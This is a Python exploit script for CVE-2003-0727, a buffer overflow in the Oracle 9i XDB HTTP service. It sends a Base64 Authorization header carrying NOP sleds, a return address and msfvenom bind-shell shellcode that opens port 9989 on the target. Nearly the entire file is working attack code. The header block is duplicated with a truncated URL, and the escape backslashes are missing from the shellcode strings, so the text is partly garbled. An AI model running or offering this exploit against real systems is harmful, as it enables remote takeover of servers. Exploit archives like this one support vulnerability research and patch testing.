#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardam #Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Version:9.2.0.1
#Tested on: Windows 2000 SP4
#CVE: 2003-0727
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/

#!/usr/bin/python


import socket, sys, base64

#usage ./oracle9i_xbd_pass <target ip> <target port>

rhost = sys.argv[1] #target ip
rport = int(sys.argv[2]) #target port

#Variables:
ret = "x46x6dx61x60" #0x60616d46 Little endian form
nop = "x90"
pre = "x81xc4xffxefxffxffx44" #This has to be prepended into the shellcode.

#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "x00" -e x86/shikata_ga_nai
#355 bytes
payload = ""
payload += pre
payload += "xbax64xdbx93xe7xdaxd6xd9x74x24xf4x58x29"
payload += "xc9xb1x53x31x50x12x83xc0x04x03x34xd5x71"
payload += "x12x48x01xf7xddxb0xd2x98x54x55xe3x98x03"
payload += "x1ex54x29x47x72x59xc2x05x66xeaxa6x81x89"
payload += "x5bx0cxf4xa4x5cx3dxc4xa7xdex3cx19x07xde"
payload += "x8ex6cx46x27xf2x9dx1axf0x78x33x8ax75x34"
payload += "x88x21xc5xd8x88xd6x9exdbxb9x49x94x85x19"
payload += "x68x79xbex13x72x9exfbxeax09x54x77xedxdb"
payload += "xa4x78x42x22x09x8bx9ax63xaex74xe9x9dxcc"
payload += "x09xeax5axaexd5x7fx78x08x9dxd8xa4xa8x72"
payload += "xbex2fxa6x3fxb4x77xabxbex19x0cxd7x4bx9c"
payload += "xc2x51x0fxbbxc6x3axcbxa2x5fxe7xbaxdbxbf"
payload += "x48x62x7exb4x65x77xf3x97xe1xb4x3ex27xf2"
payload += "xd2x49x54xc0x7dxe2xf2x68xf5x2cx05x8ex2c"
payload += "x88x99x71xcfxe9xb0xb5x9bxb9xaax1cxa4x51"
payload += "x2axa0x71xcfx22x07x2axf2xcfxf7x9axb2x7f"
payload += "x90xf0x3cxa0x80xfax96xc9x29x07x19xd2xac"
payload += "x8exffx76xbfxc6xa8xeex7dx3dx61x89x7ex17"
payload += "xd9x3dx36x71xdex42xc7x57x48xd4x4cxb4x4c"
payload += "xc5x52x91xe4x92xc5x6fx65xd1x74x6fxacx81"
payload += "x15xe2x2bx51x53x1fxe4x06x34xd1xfdxc2xa8"
payload += "x48x54xf0x30x0cx9fxb0xeexedx1ex39x62x49"
payload += "x05x29xbax52x01x1dx12x05xdfxcbxd4xffx91"
payload += "xa5x8exacx7bx21x56x9fxbbx37x57xcax4dxd7"
payload += "xe6xa3x0bxe8xc7x23x9cx91x35xd4x63x48xfe"
payload += "xf4x81x58x0bx9dx1fx09xb6xc0x9fxe4xf5xfc"
payload += "x23x0cx86xfax3cx65x83x47xfbx96xf9xd8x6e"
payload += "x98xaexd9xba"



exploit = "AAAA:" + "B"*442 + "xebx64" + (nop*2) + ret + (nop*266) +"xebx10" + (nop*109) + payload + (nop * (400-len(payload)))


request = "GET / HTTP/1.1 " + "Host: " + rhost + ":" + str(rport) + " " + "Authorization: Basic " + base64.b64encode(exploit) + " "

print ("Attacking " + rhost + ":" + str(rport))

#Connect to the target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost,rport))
#Send exploit
s.send(request)
s.close()

print ("Try to connect on port 9989.")